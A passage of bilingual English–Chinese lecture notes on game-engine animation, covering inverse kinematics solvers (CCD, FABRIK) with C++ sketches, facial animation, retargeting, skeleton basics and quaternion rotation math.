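                axis = { axis.x / axisLen, axis.y / axisLen, axis.z / axisLen };
                for (int j = i + 1; j <= end; ++j)      // 绕关节 i 旋转其下游子链
                    joints[j] = add(joints[i], rotate(sub(joints[j], joints[i]), axis, angle));
                // 真正的求解器会在这里按关节角度限制裁剪旋转量
            }
            if (len(sub(joints[end], target)) < tolerance) return; // 足够接近则提前结束
        }
    }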

    Optimized CCD (1/2)

    ​优化 CCD (1/2)

    webp

    Add tolerance regions to each bone’s goal

    ​为每个骨骼的目标添加容差区域

    • Each bone stops rotating and moves onto the next bone within tolerance region

      每个骨骼停止旋转并移动到公差范围内的下一个骨骼

    • Helps to produce poses that are less rigid and more comfortable looking

      有助于塑造不那么僵硬且看起来更舒适的姿势

    Optimized CCD (2/2)

    webp

    Use under-damped angle scaling

    ​使用欠阻尼角度缩放

    • Each joint moves only a small amount toward the goal and distributes the movement across multiple bones

      每个关节仅向目标移动少量,并将移动分布到多个骨骼上

    • Produce less abrupt joint changes and more smooth and casual poses for character movement

      减少突然的关节变化,并为角色运动提供更平滑和随意的姿势

    FABRIK (Forward And Backward Reaching Inverse Kinematics)

    ​FABRIK(前后往返式逆运动学)

    webp

    Principle

    ​原则

    • Instead of orientation space, solves the IK problem in position space

      代替方向空间,解决位置空间中的 lK 问题

    Reachability

    ​可达性

    • Algorithm can stop after a certain number of iterations to avoid the unreachable target problem (see the sketch below)

      算法可以在一定次数的迭代后停止,以避免目标不可达的问题(见下方示意代码)
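
    ​FABRIK 在位置空间里前后两趟“拖动”关节。下面的 C++ 示意复用上文 CCD 示例中的 Vec3 与 sub/norm/len 辅助函数,同样省略关节约束(带约束的版本如下文所述,在每步重新定位时把方向裁剪到有效范围):

    void solveFABRIK(std::vector<Vec3>& joints, Vec3 target,
                     int maxIterations, float tolerance) {
        int n = static_cast<int>(joints.size());
        std::vector<float> boneLen(n - 1);              // 各骨骼长度在求解中保持不变
        for (int i = 0; i + 1 < n; ++i) boneLen[i] = len(sub(joints[i + 1], joints[i]));
        Vec3 root = joints[0];
        for (int it = 0; it < maxIterations; ++it) {
            // backward:把末端钉在目标上,从末端向根部依次拖动关节
            joints[n - 1] = target;
            for (int i = n - 2; i >= 0; --i) {
                Vec3 d = norm(sub(joints[i], joints[i + 1]));
                joints[i] = { joints[i + 1].x + d.x * boneLen[i],
                              joints[i + 1].y + d.y * boneLen[i],
                              joints[i + 1].z + d.z * boneLen[i] };
            }
            // forward:把根部钉回原位,从根部向末端再拖一遍
            joints[0] = root;
            for (int i = 0; i + 1 < n; ++i) {
                Vec3 d = norm(sub(joints[i + 1], joints[i]));
                joints[i + 1] = { joints[i].x + d.x * boneLen[i],
                                  joints[i].y + d.y * boneLen[i],
                                  joints[i].z + d.z * boneLen[i] };
            }
            if (len(sub(joints[n - 1], target)) < tolerance) return;
        }
    }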

    FABRIK with constraints

    ​有约束的 FABRIK

    webp

    Re-positioning

    ​重新定位

    • Joint restrictions can be enforced at each step by taking the resultant orientation and forcing it to stay with in the valid range

      可以通过采用最终的方向并迫使其保持在有效范围内,在每一步中强制执行联合限制

    Multiple End-Effectors

    ​多个末端执行器

    webp

    • May result in conflict between goals, which can not be achieved simultaneously

      可能导致目标之间发生冲突,无法同时实现

    • May use a priority or a weighted approach

      可以使用优先级或加权方法

    IK with Multiple End-Effectors

    ​具有多个末端执行器的 IK

    webp

    If a shared bone needs to be moved, the end-effector that is updated last will get priority and the other bones will be pulled away

    ​如果需要移动共享骨骼,则最后更新的末端执行器将优先,其他骨骼将被拉走

    Jacobian Matrix

    ​雅可比矩阵

    webp

    In vector calculus, the Jacobian Matrix of a vector-valued function of several variables is the matrix of all its first-order partial derivatives

    ​在向量微积分中,多个变量向量值函数的雅可比矩阵是其所有一阶偏导数的矩阵。

    ​课上说这个雅可比矩阵要放到物理那块去讲。

    Using Jacobian Matrix to Present Joint Rotations

    ​使用雅可比矩阵表示关节旋转

    webp

    Jacobian Matrix with Multiple End-effectors

    ​具有多个末端执行器的雅可比矩阵

    $$J=\begin{bmatrix}\frac{\partial\overrightarrow{s_1}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_1}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_1}}{\partial\theta_n}\\\frac{\partial\overrightarrow{s_2}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_2}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_2}}{\partial\theta_n}\\\vdots&\vdots&\ddots&\vdots\\\frac{\partial\overrightarrow{s_m}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_m}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_m}}{\partial\theta_n}\end{bmatrix}$$

    m: the number of end-effectors

    ​$m$:末端执行器的数量

    n: the number of joints

    ​$n$:关节数量

    Approaching to Target Step by Step

    ​一步步接近目标

    webp

    Other IK Solutions

    ​其他 IK 解决方案

    Physics-based Method

    ​基于物理的方法

    • More natural

      更自然

    • Usually need lots of computation if no optimization

      如果没有优化,通常需要大量计算

    PBD (Position Based Dynamics)

    ​PBD(基于位置的动力学)

    • Different from traditional physics-based method

      与传统的基于物理的方法不同

    • Better visual performance

      更好的视觉表现

    • Lower computational cost

      较低的计算成本

    Fullbody IK in UE5

    ​UE5 中的全身 IK

    • XPBD (Extended PBD)

      XPBD(扩展 PBD)

    IK is still a Challenge

    ​IK 仍然是一个挑战

    webp

    • Self collision avoidance

      自我避免碰撞

    • IK with prediction during movement

      移动过程中带有预测的 IK

    • Natural human behavior

      人类的自然行为

      • Data-driven and deep learning

        数据驱动和深度学习

    ​如果做不好容易出现奇葩动画。

    IK Hot Research Areas

    webp

    From Inverse Kinematics Techniques in Computer Graphics: A Survey

    这篇综述认为 IK 是目前的研究热点。

    Updated Animation Pipeline with Blending and IK

    ​加入混合和 IK 后的动画管线

    webp

    Facial Animation

    ​表情动画

    Face is Driven by Complex Muscle System

    ​现实世界中,面部由复杂的肌肉系统驱动

    webp

    • 43 Muscles

      43 块肌肉

    • Varying shape, strength and movement

      不同的形状、力量和动作

    • Work together to make expressions

      一起努力制作表情

    High Precision Requirements

    ​高精度要求

    Minor change makes difference:

    ​微小的改变就会带来不同:

    • Voluntary / Forced

      自愿 / 强迫

    • Natural / intentional

      自然 / 故意

    • Sometimes shows quite opposite expressions

      有时表现出完全相反的表情

    Facial Action Coding System

    ​面部动作编码系统

    Facial Action Coding System (FACS) is a system to taxonomize human facial movements by their appearance on the face.

    ​面部动作编码系统(FACS)是一种根据人类面部动作在面部的外观进行分类的系统。

    webp

    Part of the 46 basic movements are named Action Units (AUs)

    ​46 个基本动作中的一部分被称为动作单元 (AU)

    Action Units combination

    ​动作单元组合

    webp

    An expression can be considered as a combination of some of the basic movements

    ​一个表情可以被认为是一些基本动作的组合

    28 Core Action units

    ​28 个核心动作单元

    webp

    • Apple Inc. extracted the 28 core AUs

      Apple Inc. 提取了 28 个核心 AU

    • 23 Symmetric AUs are divided into two basic actions

      23 个对称 AU 分为两个基本动作

    • The basic action set varies according to the animation production requirements

      基本动作设置根据动画制作要求而变化

    Key Pose Blending

    ​关键姿势混合

    webp

    A set of key poses (a variation on per-vertex animation)

    ​一组关键姿势(逐顶点动画的变体)

    Problems of Simple Blending

    webp

    ​简单的表情动画混合可能不太好使。比如我想用一个张嘴和闭眼的动作合成一个既张嘴又闭眼的动作。

    FACS In Morph Target Animation

    ​变形目标动画中的 FACS

    webp

    Vertex offset from neutral face

    ​顶点与中性面的偏移

    • Create AU key poses that only store vertices different from the neutral pose (Additive Blending)

      创建 AU 关键姿势,仅存储与中性姿势不同的顶点(加法混合)

    Morph Target Animation

    ​变形目标动画

    webp

    webp

    ​一般表情动画都是顶点动画,不过也可以用骨骼动画强行做。

    UV Texture Facial Animation

    ​UV 纹理面部动画

    webp

    Using a series of texture maps applied to a simple head shape

    ​使用一系列应用于简单头部形状的纹理贴图。Live2D 就是这么做的。

    Muscle Model Animation

    webp

    Relies on a physical basis; more precise, but more sophisticated

    ​在依赖物理基础上,更精确,但更复杂。还在研究阶段,没用被广泛应用。

    • Muscle controls most part of the face

      肌肉控制着脸部的大部分

    • 3 Layers: Skin Layer, Muscle Layer, Bone Layer

      3 层:皮肤层、肌肉层、骨骼层

    • The point of insertion will move an amount determined by the muscle

      插入点将移动由肌肉决定的量

    The model used for the skin will dictate how the area around the insertion point muscle reacts

    ​用于皮肤的模型将决定插入点肌肉周围的区域如何反应

    Metahuman

    ​MetaHuman(Epic 的数字人技术)

    Animation Retargeting

    ​动画重定向

    Share Animation Among Characters

    ​在角色之间共享动画

    webp

    • Allow animations to be reused between characters (save animator’s work)

      允许在角色之间重复使用动画(节省动画师的工作)

    • Adapt motion captured animations to different characters (reduce the cost)

      使动作捕捉动画适应不同的角色(降低成本)

    Terminology

    ​术语

    webp

    ​已知 Source Character、Target Character 和 Source Animation,求 Target Animation。

    Ignore Offset Between Source and Target joints

    ​忽略源关节和目标关节之间的偏移

    webp

    Keep Orientation in Different Binding Pose

    ​保持不同绑定姿势的方向

    webp

    Process Tracks

    ​分别处理各个轨道

    webp

    Handle animation tracks respectively

    ​分别处理动画轨迹

    • Rotation track comes from source animation

      旋转轨迹来自源动画

      • Keep joint orientation in animation

        保持动画中的关节方向

    • Translation track comes from target skeleton

      平移轨迹来自目标骨架

      • Keep the proportion of target skeleton

        保持目标骨骼的比例

    • Scale track comes from source animation

      缩放轨迹来自源动画

      • Keep the scale in animation

        保持动画比例

    Align Movement by Pelvis Height

    ​根据骨盆高度对齐运动

    webp

    The movement of the character

    ​角色的动作

    • Usually controlled by displacement curve or motor system at runtime

      通常在运行时由位移曲线或 motor 系统控制

      • Displacement Curve is extracted from the pelvis pose in animation

        位移曲线是从动画中的骨盆姿势中提取的

    • Needs to be scaled by the proportion of the pelvis

      需要根据骨盆的比例进行缩放

    Lock Feet by IK after Retargeting

    ​重定向后用 IK 锁定双脚

    webp

    Source Skeleton (left) vs. Target Skeleton with longer thigh (middle) or longer calf (right)

    ​源骨骼(左)与大腿较长(中)或小腿较长(右)的目标骨骼

    webp

    If the thigh is horizontal (left), longer thigh results in hanging feet (middle) while longer calf results in penetration (right)

    ​如果大腿是水平的(左),较长的大腿会导致悬足(中),而较长的小腿则会导致穿透(右)

    Retargeting with Different Skeleton Hierarchy

    ​使用不同的骨架层次结构进行重定向

    webp

    Source Skeleton with 1 spine (left) vs. Target Skeleton with 3 spines (center)

    ​具有 1 个脊柱的源骨骼(左)与具有 3 个脊柱的目标骨骼(中)

    ​不同人物的骨骼数量可能不同。

    Easy Solution

    webp

    ​绑定骨骼时做好严格的规范,这样就能做到不同数量骨骼间的映射。

    Retargeting Animation in Omniverse

    ​Omniverse 中的重定向动画

    Unresolved Problems of Retargeting

    ​未解决的重定向问题

    webp

    • Self mesh penetration

      自网格穿透

    • Self contact constraints (e.g. the hands when clapping)

      自我接触限制(例如拍手时的手)

    • The balance of the target character

      目标角色的平衡性

    Morph Animation Retargeting

    ​变形动画重定向

    webp

    Different face sharing the same topology

    ​不同的面共享相同的拓扑

    Morph Animation Retargeting Problem

    webp

    webp

    ​动画重定向后眼睛闭不上之类的问题。

    Take Away

    • A controlled animation blending system is the key to animating characters according to gameplay

      受控的动画混合系统是让角色动画配合游戏玩法的关键

    • Inverse Kinematics helps a character's animation adapt to environment constraints

      逆运动学帮助角色的动画适应环境限制

    • Facial expression can be encoded in Action Units in FACS

      面部表情可以编码在 FACS 的动作单元中

    • Morph target animation is well applied in facial animation

      变形目标动画在面部动画中得到很好的应用

    • Retargeting can help reuse skeleton animations and facial animations among characters

      重新定位可以帮助在角色之间重用骨骼动画和面部动画

    ]]>
    + 资源

    课程

    第八节:游戏引擎的动画技术基础

    Animation System

    Basics of Animation Technology

    Humans have been trying to represent objects in motion

    ​人类一直在尝试表现运动中的物体

    webp

    webp

    • The persistence of vision

      视觉暂留

    • Illusory motion

      虚幻的运动

    webp

    Animation Techniques in Film

    ​动画产业最早从电影兴起。

    webp

    webp

    • Hand Draw Animation

      手绘动画

    • Cel Animation

      赛璐珞动画

    ​Cel animation 是一种传统的动画制作技术,也被称为传统动画。它是通过在透明的塑料或树脂片上手绘动画角色和背景,然后将它们叠加在一起,逐帧拍摄来制作动画。这种技术在过去几十年一直被广泛应用,直到计算机动画技术的出现。

    • Computer Animation

      计算机动画

    Animation Techniques in Game

    webp

    ​最早的游戏动画来自 2D。Doom 是一个用 2D 技术做的 3D 效果的游戏。

    webp

    • Rigid Hierarchy Animation

      刚性层阶式动画,容易穿模

    • Soft Skinned Animation

      蒙皮动画

    • Physics Animation

      物理动画

    Challenges in Game Animation (1/3)

    webp

    Interactive and dynamic animation

    ​互动和动态动画

    • Vary according to the interaction

      根据互动而变化

    • Cooperate with other gameplay systems

      与其他游戏系统配合

    • Make adjustments in complex environments

      在复杂环境下进行调整

    Challenges in Game Animation (2/3)

    webp

    Real-time

    • Compute per frame

      逐帧计算(在一帧内完成所有计算)

    • Massive animation data (Disk and memory)

      海量动画数据(磁盘和内存)

    Challenges in Game Animation (3/3)

    Realism

    ​现实主义

    • More vivid expression

      更生动的表达

    • More authentic experience

      更真实的体验

    webp

    • Facial Animation

      面部动画

    • Ragdoll Physics

      布娃娃物理

    • Motion Matching

      运动匹配

    Outline of Animation System

    • Basics of Animation Technology

      动画技术基础

      2D Animation

      2D 动画

      3D Animation

      3D 动画

      Skinned Animation Implementation

      蒙皮动画实现

      Animation Compression

      动画压缩

      Animation DCC

    ​动画 DCC 是指动画数字内容创建(Digital Content Creation)工具,通常是指用于制作电影、电视、游戏和其他数字媒体内容的软件套件。这些工具能够帮助动画师和艺术家制作、编辑和渲染动画和视觉效果,从而实现各种复杂和精细的动画效果。

    • Advanced Animation Technology

      先进的动画技术

      Animation Blend

      动画混合

      Inverse Kinematics

      逆运动学

      Animation Pipeline

      动画管线

      Animation Graph

      动画图

      Facial Animation

      面部动画

      Retargeting

      重定向

    2D Animation Techniques in Games

    2D Animation-Sprite animation

    webp

    The electronic equivalent to cel animation

    ​相当于赛璐珞动画的电子版

    • A sprite is a small bitmap that can be overlaid on top of a background image without disrupting it

      精灵是一个小位图,可以覆盖在背景图像之上而不破坏它

    • The sequence of frames was designed so that it animates smoothly even when it is repeated indefinitely

      帧序列经过精心设计,即使无限重复,动画也能流畅进行

    The Sprite-like animation technique in pseudo-3D game

    ​伪 3D 游戏中的类精灵动画技术

    webp

    ​用 2D 画出 3D 中各个视角的图片。

    Sprite Animation in Modern Game

    webp

    Application

    ​应用

    • 2D character

      2D 角色

      • Sprite on 2D background image

        2D 背景图像上的精灵

      • Sprite on top of 3D rendered environment

        3D 渲染环境之上的精灵

    • Game effect

      游戏效果

      • Sprite sheet texture for particles

        粒子的精灵片纹理

    Live2D

    webp

    A technology to generate 2D animation without 3D model

    ​一种无需 3D 模型即可生成 2D 动画的技术

    • Usually refers to the eponymous software series employing the technology created by Live2D Ltd.

      通常指采用 Live2D Ltd. 创建的技术的同名软件系列。

    • Can create dynamic characters, especially anime-style characters, without a 3D model

      无需 3D 模型即可开发动态角色,尤其是动漫风格的角色

    webp

    • By applying translation, rotation and transformation to different parts and layers of image.

      通过对图像的不同部分和图层应用平移、旋转和变换。

    • Combined with real-time motion capture, could be used for vtubing

      结合实时动作捕捉,可用于 vtubing

    webp

    Make a Live2D animation

    ​制作 Live2D 动画

    Prepare resources

    ​准备资源

    • Dividing the original character image into different parts

      将原始角色图像分为不同的部分

    • Set a "draw order" for each part for further use

      为每个部分设置“绘制顺序”以供后续使用

    webp

    Make a Live2D animation

    ​制作 Live2D 动画

    Transform image by using control points for parts

    ​使用零件的控制点变换图像

    • An “ArtMesh”, defined by vertices, edges and polygons, can be automatically generated for each part

      可以为每个部分自动生成“ArtMesh”,它由顶点、边和多边形定义

    • Control points can be used to help transform the “ArtMesh”

      控制点可用于帮助变形“ArtMesh”

    webp

    Make a Live2D animation

    ​制作 Live2D 动画

    Set animation “key frame”

    ​设置动画“关键帧”

    • Set “key frame” to help animation interpolation

      设置“关键帧”以帮助动画插值

    3D Animation Techniques in Games

    DoF (Degrees of Freedom)

    webp

    • refers to the number of independent variables or parameters of a system

      指系统的自变量或参数的数量

    DoF For rigid objects

    ​DoF 对于刚性物体

    webp

    • 6 DoFs per object or sub-part

      每个对象或子部分有 6 个自由度

    Rigid Hierarchical Animation

    ​刚性层阶式动画

    webp

    • The earliest approach to 3D character animation

      最早的 3D 角色动画方法

    • A character is modeled as a collection of rigid pieces

      角色被建模为刚性部件的集合

    • The rigid pieces are constrained to one another in a hierarchical fashion

      刚性部件以分层方式相互约束

    Per-vertex Animation

    ​顶点动画

    webp

    ​与蒙皮动画相比,顶点动画更适合模拟流体或是布匹。

    • Most flexible (3 DoFs per vertex)

      最灵活(每个顶点 3 个自由度)

    • Mostly implemented by Vertex Animation Texture (VAT)

      主要由顶点动画纹理(VAT)实现

    • Suitable for complex morphing

      适用于复杂的变形

    • Need massive data

      需要海量数据

    Morph Target Animation

    webp

    • A variation on Per-vertex Animation

      逐顶点动画的变体

      • Use key frames with LERP instead of sequence frames (e.g. 30 frames per second)

        使用带有 LERP 的关键帧而不是序列帧(例如每秒 30 帧)

    • Suitable for facial expression

      适合面部表情

    3D Skinned Animation

    webp

    • Mesh (or skin) is bound to the joints of the skeleton

      网格(或皮肤)绑定到骨骼的关节

    • Each vertex can be weighted to multiple joints

      每个顶点可以加权到多个关节

    Advantages

    ​优点

    • Need less data than per-vertex animation

      比逐顶点动画需要更少的数据

    • Mesh can be animated in a natural way (like human “skin”)

      网格可以以自然的方式进行动画处理(就像人类的“皮肤”)

    2D Skinned Animation

    webp

    Derived from 3D skinned animation

    ​源自 3D 蒙皮动画

    • Break up character into various body parts

      将角色分解为不同的身体部位

    • Create body part meshes and piece them together

      创建身体部位网格并将它们拼凑在一起

    • Rigging, skinning and animation

      绑定、蒙皮和动画

    Physics-based Animation

    webp

    • Ragdoll

      布娃娃

    • Cloth and Fluid simulation

      布料和流体模拟

    • Inverse Kinematics (IK)

      逆运动学 (IK)

    Animation Content Creation

    webp

    ​动画内容创作方式:

    • Digital Content Creator + Animator

      数字内容创作者 + 动画师

    • Motion Capture

      动作捕捉

    Skinned Animation Implementation

    ​蒙皮动画实现

    webp

    How to Animate a Mesh

    ​如何制作网格动画

    1. Create mesh for a binding pose

      为绑定姿势创建网格

    2. Create a binding skeleton for the mesh

      为网格创建绑定骨架

    3. “Paint” per-vertices skinning weights to related skeleton

      将每个顶点蒙皮权重“绘制”到相关骨架

    4. Animate skeleton to desired pose

      将骨骼动画化为所需的姿势

    5. Animate skinned vertices by skeleton and skinning weights

      通过骨架和蒙皮权重对蒙皮顶点进行动画处理

    Different Spaces

    webp

    ​要考虑三个坐标系:

    • Local space, Model space and World space

      局部坐标,模型坐标和世界坐标

    Skeleton for Creatures

    ​生物骨骼

    webp

    Comprised of a hierarchy of rigid pieces known as joints

    ​由称为关节的刚性部件的层次结构组成

    • One joint is selected as the root

      选择一个关节作为根

    • Every joint has a parent joint except the root

      除根关节外,每个关节都有一个父关节

    Joint vs. Bone

    ​关节和骨骼

    webp

    • The joints are the objects directly manipulated by the animator to control motion

      关节是动画师直接操纵以控制运动的对象

    • The bones are the empty space between the joints

      骨头是关节之间的空隙

    Humanoid Skeleton in Real Games

    ​真实游戏中的人形骨骼

    webp

    Number of joints in a humanoid skeleton

    ​人形骨骼中的关节数量

    • Normal: 50~100 joints

      正常:50~100 个关节

    • May be more than 300 joints, including facial joints and gameplay joints

      可能超过 300+ 关节,包括面部关节和游戏关节

    Joints for Game Play

    webp

    • Additional joints

      附加关节

    • Weapon joint

      武器关节

    • Mount joint

      挂载关节(例如坐骑)

    Where to Start the Skeleton - Root Joint

    ​一般都是髋关节做 Pelvis joint,脚底中心作 Root joint

    webp

    Root joint

    ​根关节

    • The center of the feet

      脚的中心

    • Convenient to touch the ground

      方便接触地面

    Pelvis joint

    ​骨盆关节

    • The first child joint of the root joint

      根关节的第一个子关节

    • Human upper and lower body separation

      人体上下半身分离

    How to Handle Horse Skeleton?

    webp

    ​一般把马的 Pelvis joint 和 Root joint 放置在如图位置。

    Bind Animation for Objects

    ​为对象绑定动画

    webp

    Attach two skeleton’s bind point

    ​连接两个骨架的绑定点

    Bind Pose-T-pose vs. A-pose

    ​绑定姿势-T 姿势与 A 姿势

    webp

    The pose of the 3D mesh prior to being bound to the skeleton

    ​3D 网格在绑定到骨架之前的姿势

    • Keep the limbs away from the body and each other, making the process of binding the vertices to the joints easier

      使四肢远离身体和彼此,使将顶点绑定到关节的过程更容易

    • Usually close to natural pose

      通常接近自然姿势

    T-pose vs A-pose

    • Shoulders in A-pose are more relaxed

      A 字式的肩膀更加放松(T 字式的肩膀容易挤压导致扭曲,所以现在更偏好 A 字式)

    • Easier to deform in A-pose

      A 姿势下更容易做形变

    Skeleton Pose

    Skeleton Pose: A skeleton is posed by transforming its joints from the bind pose

    ​骨骼姿势:通过从绑定姿势变换其关节来摆出骨骼姿势

    webp

    Joint Pose (9 DoFs)

    ​关节姿势(9 个自由度)

    • Orientation (3 DoFs)

      方向(3 个自由度)

    • Position (3 DoFs)

      位置(3 个自由度)

    • Scale (3 DoFs)

      比例(3 个自由度)

    Math of 3D Rotation

    2D Orientation Math

    webp

    ​2D 旋转用一个 $\alpha$ 来表示很简单。

    3D Orientation Math

    Euler Angle

    ​用欧拉角来表示三维旋转。

    • 3D-Rotation by single axis

      以 $x,y,z$ 某个轴旋转 $\alpha,\beta,\gamma$

    webp

    • 3D-Rotation combined by $x, y, z$ axis sequentially

      由 $x, y, z$ 轴顺序组合的 3D 旋转

    webp

    Euler Angle

    Euler Angle provides a brief description of 3D rotation and is widely used in many fields

    ​欧拉角提供了 3D 旋转的简要描述,广泛应用于许多领域

    webp

    • Yaw angle:$\psi$ 飞机左右转弯
    • Pitch angle:$\theta$ 飞机抬头低头
    • Roll angle:$\phi$ 飞机左右倾斜

    Order Dependence on Euler Angle

    ​欧拉角的阶次依赖性

    webp

    ​欧拉角旋转看上去直观,但是旋转次序将会影响最终的旋转效果。

    Gimbal Lock

    ​万向节锁

    webp

    ​Gimbal Lock 是三维空间中的一个现象,通常发生在使用欧拉角(Euler Angles)描述物体旋转时,尤其是在使用万向节(Gimbal)结构进行旋转时。这个现象会导致失去一个旋转自由度,使得物体在某些情况下无法继续按预期旋转。

    ​为了理解 Gimbal Lock,首先需要了解欧拉角和万向节结构。

    欧拉角是一种描述物体旋转的方法,通过三个轴(通常是 X、Y、Z 轴)的旋转角度来表示物体的方向。然而,当旋转过程中某两个轴对齐时,就会发生 Gimbal Lock。

    ​万向节是一种机械结构,由多个轴构成,每个轴都可以绕自己的轴旋转。但当其中两个轴对齐时,就会发生 Gimbal Lock,因为这会使得第三个轴失去了自由度。

    ​具体来说,当两个轴对齐时,旋转操作将不再在三个轴的独立空间内进行,而是会导致旋转操作影响到其他轴,从而导致无法预期的结果。这使得物体在某些情况下无法继续自由旋转,因为其中一个轴的旋转将会影响到其他轴的方向,导致失去了自由度。

    ​为了避免 Gimbal Lock,可以使用其他方法来描述旋转,如四元数(Quaternions),它们不会受到 Gimbal Lock 的限制。此外,在使用欧拉角时,可以采用一些技巧和限制来尽量避免 Gimbal Lock 的发生。

    Degeneration of Euler Angle

    ​欧拉角退化

    webp

    Problems of Euler Angle

    ​欧拉角问题

    webp

    Rotation Combination

    ​旋转结合

    webp

    Rotation By Certain Axis

    ​按特定轴旋转


    • Gimbal Lock

      万向节锁

      Gimbal Lock occurs because of the loss of one DoF

      由于失去一个自由度而发生万向节锁定

    • Hard to interpolate

      难以插值

      Singularity problems make it hard to interpolate

      奇点问题使得插值变得困难

    • Difficult for rotation combination

      旋转组合困难

      Rotation combination need rotation matrix

      旋转组合需要旋转矩阵

    • Hard to rotate by certain axis

      难以按特定轴旋转

      Easy to rotate about the $x,y,z$ axes but hard about other axes

      绕 $x$、$y$、$z$ 轴旋转很容易,但绕其他轴很难

    Quaternion

    ​四元数用于表示旋转。

    ​它们结构紧凑,不受万向锁影响,可以轻松插值。 Unity 内部使用四元数来表示所有旋转。

    ​它们基于复数,不容易理解。 您几乎不会有机会访问或修改单个四元数分量($x$、$y$、$z$、$w$); 大多数情况下,您只需要获取现有旋转(例如,来自 Transform),然后使用它们构造新的旋转 (例如,在两个旋转之间平滑插值)。 您绝大多数时间使用的四元数函数为:Quaternion.LookRotation、Quaternion.Angle、Quaternion.Euler、Quaternion.Slerp、Quaternion.FromToRotation、Quaternion.identity。(其他函数仅用于一些十分奇特的用例。)

    引入四元数解决万向节锁的问题。

    webp

    Every morning in the early part of October 1843, on my coming down to breakfast, your brother William Edwin and yourself used to ask me: “Well, Papa, can you multiply triples?” Whereto I was always obliged to reply, with a sad shake of the head, “No, I can only add and subtract them.”

    ​1843 年 10 月上旬,每天早上,当我下楼吃早餐时,你的兄弟威廉·埃德温和你都会问我:“爸爸,你能把三元组相乘吗?”对此,我总是不得不悲伤地摇头回答:“不,我只能对它们做加减。”

    Complex Number and 2D Rotation

    ​引入复数概念探讨 2D 旋转问题。

    Complex Number

    • Definition

      $c=a+bi\ (a,b\in\mathbb{R})$

      $i^2=-1$

    • Represent as Vector

      $c=\begin{bmatrix}a\\b\end{bmatrix}$

    • Product

      $c_1=a+bi\quad c_2=c+di\quad c_1c_2=\begin{bmatrix}a&-b\\b&a\end{bmatrix}\begin{bmatrix}c\\d\end{bmatrix}$

    webp

    ​对于角 $\alpha$ 用 $z=a+bi$ 表示,角 $\beta$ 用 $w=c+di$ 表示,则 $\alpha+\beta$ 可以用 $zw=(a+bi)(c+di)$ 表示。

    Quaternion

    类比于 2D,用四元数表示三维的旋转。

    Quaternion

    • Definition

      $q=a+bi+cj+dk\quad(a,b,c,d\in\mathbb{R})\quad i^2=j^2=k^2=ijk=-1$

    • Represent as two parts pair (real number and vector)

      表示为两部分对(实数和向量)

      $q=(a,v)\quad(v=\begin{bmatrix}b\\c\\d\end{bmatrix},a,b,c,d\in\mathbb{R})$

    • Product

      $q_1=a+bi+cj+dk\quad q_2=e+fi+gj+hk\quad q_1q_2=\begin{bmatrix}a&-b&-c&-d\\b&a&-d&c\\c&d&a&-b\\d&-c&b&a\end{bmatrix}\begin{bmatrix}e\\f\\g\\h\end{bmatrix}$

      用 $q_1q_2$ 表示先旋转 $q_1$ 再旋转 $q_2$

    • Norm

      $||q||=\sqrt{a^2+b^2+c^2+d^2}$

    • Conjugate

      共轭

      $q^*=a-bi-cj-dk$

    • Inverse

      $q^{-1}q=qq^{-1}=1$

    Euler Angle to Quaternion

    webp

    $$q=[1\quad i\quad j\quad k]\begin{bmatrix}\cos(\gamma/2)\cos(\beta/2)\cos(\alpha/2)+\sin(\gamma/2)\sin(\beta/2)\sin(\alpha/2)\\\sin(\gamma/2)\cos(\beta/2)\cos(\alpha/2)-\cos(\gamma/2)\sin(\beta/2)\sin(\alpha/2)\\\cos(\gamma/2)\sin(\beta/2)\cos(\alpha/2)+\sin(\gamma/2)\cos(\beta/2)\sin(\alpha/2)\\\cos(\gamma/2)\cos(\beta/2)\sin(\alpha/2)-\sin(\gamma/2)\sin(\beta/2)\cos(\alpha/2)\end{bmatrix}$$
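
    ​把上式直接翻译成代码大致如下(C++ 示意;旋转轴与旋转次序的约定因引擎而异,这里只是与上式一致的假设):

    #include <cmath>

    struct Quat { float w, x, y, z; }; // 演示用的最小四元数类型

    Quat eulerToQuaternion(float alpha, float beta, float gamma) {
        float ca = std::cos(alpha * 0.5f), sa = std::sin(alpha * 0.5f);
        float cb = std::cos(beta * 0.5f),  sb = std::sin(beta * 0.5f);
        float cg = std::cos(gamma * 0.5f), sg = std::sin(gamma * 0.5f);
        return { cg * cb * ca + sg * sb * sa,   // 实部
                 sg * cb * ca - cg * sb * sa,   // i
                 cg * sb * ca + sg * cb * sa,   // j
                 cg * cb * sa - sg * sb * ca }; // k
    }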

    Rotation by Quaternion

    Quaternion

    • Vector to quaternion

      • A 3D vector $\mathbf v$ could be written inquaternion format as follow:

        $v_q=(0,v)=bi+cj+dk\quad v=\begin{bmatrix}b\\c\\d\end{bmatrix}$

    • Rotation

      $v_q'=qv_qq^*=qv_qq^{-1}$

    $$q^*=a-bi-cj-dk$$

    $$q_1=a+bi+cj+dk\quad q_2=e+fi+gj+hk\quad q_1q_2=\begin{bmatrix}a&-b&-c&-d\\b&a&-d&c\\c&d&a&-b\\d&-c&b&a\end{bmatrix}\begin{bmatrix}e\\f\\g\\h\end{bmatrix}$$

    Quaternion to Rotation Matrix

    $$\begin{aligned}&q=(a,b,c,d)\quad||q||=1\\&v'=\begin{bmatrix}1-2c^2-2d^2&2bc-2ad&2ac+2bd\\2bc+2ad&1-2b^2-2d^2&2cd-2ab\\2bd-2ac&2ab+2cd&1-2b^2-2c^2\end{bmatrix}v\end{aligned}$$

    Rotation Math by Quaternion

    Inverse Resolving

    ​逆旋转

    webp

    $$q^{-1}=\frac{q^*}{||q||^2}$$

    Rotation Combination

    ​复合旋转

    webp

    $$\begin{aligned}
    q_1^*q_2^*&=(q_2q_1)^*\\
    v'&=q_1vq_1^*\\
    v''&=q_2v'q_2^*\\
    &=q_2q_1vq_1^*q_2^*\\
    &=(q_2q_1)v(q_2q_1)^*
    \end{aligned}$$

    Quaternion between Two Unit Vectors

    ​两个单位向量之间的四元数

    webp
    $$\begin{aligned}
    &w=u\times v\\
    &q=[u\cdot v+\sqrt{(w\cdot w)+(u\cdot v)^2},\ w]\\
    &(||u||=||v||=1)
    \end{aligned}$$

    Given Axis Rotation by Quaternion

    Quaternion

    webp

    • Vector to quaternion

      向量到四元数

      • A 3D vector $\mathbf v$ could be written in quaternion format as follow:

        3D 向量 $\mathbf v$ 可以写成四元数格式,如下所示:

